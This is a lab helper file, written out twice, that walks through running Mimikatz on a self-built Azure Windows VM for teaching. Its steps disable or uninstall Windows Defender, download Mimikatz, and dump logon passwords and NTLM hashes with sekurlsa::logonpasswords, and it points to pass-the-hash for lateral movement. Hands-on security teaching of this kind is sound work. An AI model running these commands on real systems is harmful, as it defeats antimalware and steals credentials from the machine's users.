codingoutloud/mimikatz-lab-helpers.txt

## mimikatz-lab-helpers.txt
# For educational purposes only

## STEP 0 - Create a Windows VM in the cloud, such as a Windows 2016 Server in Azure, with RDP enabled

Log in via RDP

Open PowerShell as Administrator

if you want to download local PowerShell help to poke around:
Get-Help curl

the curl command is familiar to many, but is really an alias in PowerShell:
alias curl

Will probably want this:
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12


## STEP 1 - Defeat Windows Antimalware on Windows Server

This is syntactically correct, but doesn't succeed if you have antivirus software runnning:
curl https://github.com/gentilkiwi/mimikatz/releases/download/2.2.0-20220919/mimikatz_trunk.zip -Outfile mm.zip

## don't think this works! try explicit path
Add-MpPreference -ExclusionPath .
Set-MpPreference -ExclusionPath C:\Users\mimikatz # YOUR PATH MUST GO IN

Get-MpComputerStatus

Get-MpComputerStatus | select RealTimeProtectionEnabled
Set-MpPreference -DisableRealtimeMonitoring $true
Get-MpComputerStatus | select RealTimeProtectionEnabled

# Nuclear option if more surgical above does not work
# By be more valuable on other operating systems or versions
Uninstall-WindowsFeature -Name Windows-Defender # nuclear option
Restart-Computer

## STEP 2 - DOWNLOAD and UNZIP MIMIKATZ

# The link you want to download for this lab is a pre-built zip file - to find latest, go here:
#    https://github.com/gentilkiwi/mimikatz/releases
# and then search for
#    mimikatz_trunk.zip
# The full-path link to mimikatz_trunk.zip is what you want. As of this update (Nov 2023) here's the full-path link:
#    https://github.com/gentilkiwi/mimikatz/releases/download/2.2.0-20220919/mimikatz_trunk.zip

# adjust to latest download file from https://github.com/gentilkiwi/mimikatz/releases
curl https://github.com/gentilkiwi/mimikatz/releases/download/2.2.0-20220919/mimikatz_trunk.zip -Outfile mm.zip

Unblock-File .\mm.zip
Expand-Archive .\mm.zip

## STEP 3 - Use Mimikatz

cd mimi
cd x64
.\mimikatz.exe

.\mimikatz.exe "sekurlsa::logonpasswords" "exit"
.\mimikatz.exe "sekurlsa::logonpasswords" "exit" | Select-String "NTLM"

consider start .\mimikatz.exe

?
hostname
answer
vault::list

log hack.log
privilege::debug
sekurlsa::logonpasswords

## STEP 4 - Stuff we don't cover

Learn more about mimikatz here:
https://github.com/gentilkiwi/mimikatz/
or on YouTube

Use the captured NTLM hash with the known "pass the hash" exploit

## MISC

Generate a 32 char password from Azure Cloud Shell bash command line:
openssl rand -base64 32
openssl rand 200 | tr -dc '!@#$%^._A-Z-a-z-0-9' | cut -c '1-32'

NTLM hash generators (you give a password, it produces NTLM hash)
--> I can't vouch for any of these so please use one of the above password generators to create a random one for this purpose - don't give it your real one, or at least change it right after if you do (and never use it again)

https://codebeautify.org/ntlm-hash-generator
https://www.ipvoid.com/ntlm-generator/
https://www.browserling.com/tools/ntlm-hash

Reset password on Windows Server VM (not in domain) from command line (because copy/paste into the password reset box may not work)

net user administrateur "t/C7Wp3OJ+Sfg2WkadfxZ5weyvJ/v9J0CsOHQfUg+sQ="

Here is more info about WHY the Mimikatz NTLM hash discovery is so powerful:

1. Use Alternate Authentication Material: Pass the Hash, Sub-technique T1550.002 - Enterprise | MITRE ATT&CK®
https://attack.mitre.org/techniques/T1550/002/

2. Credentials from Password Stores, Technique T1555 - Enterprise | MITRE ATT&CK®
https://attack.mitre.org/techniques/T1555/

3. The MITRE ATT&CK Framework: Credential Access | Tripwire
https://www.tripwire.com/state-of-security/the-mitre-attck-framework-credential-access#:~:text=The%20goal%20here%20is%20making%20password%20cracking%20difficult,time%20it%20would%20take%20to%20crack%20the%20password.

The first one above is about the famous “pass the hash” hack which can allow for “lateral movement” (https://attack.mitre.org/tactics/TA0008/) once you’ve breached one VM.

The second is about accessing password stores generally, and the third explains why you want passwords to be HARD TO REVERSE (“The goal here is making password cracking difficult for attackers”).
	# For educational purposes only

	## STEP 0 - Create a Windows VM in the cloud, such as a Windows 2016 Server in Azure, with RDP enabled

	Log in via RDP

	Open PowerShell as Administrator

	if you want to download local PowerShell help to poke around:
	Get-Help curl

	the curl command is familiar to many, but is really an alias in PowerShell:
	alias curl

	Will probably want this:
	[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12


	## STEP 1 - Defeat Windows Antimalware on Windows Server

	This is syntactically correct, but doesn't succeed if you have antivirus software runnning:
	curl https://github.com/gentilkiwi/mimikatz/releases/download/2.2.0-20220919/mimikatz_trunk.zip -Outfile mm.zip

	## don't think this works! try explicit path
	Add-MpPreference -ExclusionPath .
	Set-MpPreference -ExclusionPath C:\Users\mimikatz # YOUR PATH MUST GO IN

	Get-MpComputerStatus

	Get-MpComputerStatus \| select RealTimeProtectionEnabled
	Set-MpPreference -DisableRealtimeMonitoring $true
	Get-MpComputerStatus \| select RealTimeProtectionEnabled

	# Nuclear option if more surgical above does not work
	# By be more valuable on other operating systems or versions
	Uninstall-WindowsFeature -Name Windows-Defender # nuclear option
	Restart-Computer

	## STEP 2 - DOWNLOAD and UNZIP MIMIKATZ

	# The link you want to download for this lab is a pre-built zip file - to find latest, go here:
	# https://github.com/gentilkiwi/mimikatz/releases
	# and then search for
	# mimikatz_trunk.zip
	# The full-path link to mimikatz_trunk.zip is what you want. As of this update (Nov 2023) here's the full-path link:
	# https://github.com/gentilkiwi/mimikatz/releases/download/2.2.0-20220919/mimikatz_trunk.zip

	# adjust to latest download file from https://github.com/gentilkiwi/mimikatz/releases
	curl https://github.com/gentilkiwi/mimikatz/releases/download/2.2.0-20220919/mimikatz_trunk.zip -Outfile mm.zip

	Unblock-File .\mm.zip
	Expand-Archive .\mm.zip

	## STEP 3 - Use Mimikatz

	cd mimi
	cd x64
	.\mimikatz.exe

	.\mimikatz.exe "sekurlsa::logonpasswords" "exit"
	.\mimikatz.exe "sekurlsa::logonpasswords" "exit" \| Select-String "NTLM"

	consider start .\mimikatz.exe

	?
	hostname
	answer
	vault::list

	log hack.log
	privilege::debug
	sekurlsa::logonpasswords

	## STEP 4 - Stuff we don't cover

	Learn more about mimikatz here:
	https://github.com/gentilkiwi/mimikatz/
	or on YouTube

	Use the captured NTLM hash with the known "pass the hash" exploit

	## MISC

	Generate a 32 char password from Azure Cloud Shell bash command line:
	openssl rand -base64 32
	openssl rand 200 \| tr -dc '!@#$%^._A-Z-a-z-0-9' \| cut -c '1-32'

	NTLM hash generators (you give a password, it produces NTLM hash)
	--> I can't vouch for any of these so please use one of the above password generators to create a random one for this purpose - don't give it your real one, or at least change it right after if you do (and never use it again)

	https://codebeautify.org/ntlm-hash-generator
	https://www.ipvoid.com/ntlm-generator/
	https://www.browserling.com/tools/ntlm-hash

	Reset password on Windows Server VM (not in domain) from command line (because copy/paste into the password reset box may not work)

	net user administrateur "t/C7Wp3OJ+Sfg2WkadfxZ5weyvJ/v9J0CsOHQfUg+sQ="

	Here is more info about WHY the Mimikatz NTLM hash discovery is so powerful:

	1. Use Alternate Authentication Material: Pass the Hash, Sub-technique T1550.002 - Enterprise \| MITRE ATT&CK®
	https://attack.mitre.org/techniques/T1550/002/

	2. Credentials from Password Stores, Technique T1555 - Enterprise \| MITRE ATT&CK®
	https://attack.mitre.org/techniques/T1555/

	3. The MITRE ATT&CK Framework: Credential Access \| Tripwire
	https://www.tripwire.com/state-of-security/the-mitre-attck-framework-credential-access#:~:text=The%20goal%20here%20is%20making%20password%20cracking%20difficult,time%20it%20would%20take%20to%20crack%20the%20password.

	The first one above is about the famous “pass the hash” hack which can allow for “lateral movement” (https://attack.mitre.org/tactics/TA0008/) once you’ve breached one VM.

	The second is about accessing password stores generally, and the third explains why you want passwords to be HARD TO REVERSE (“The goal here is making password cracking difficult for attackers”).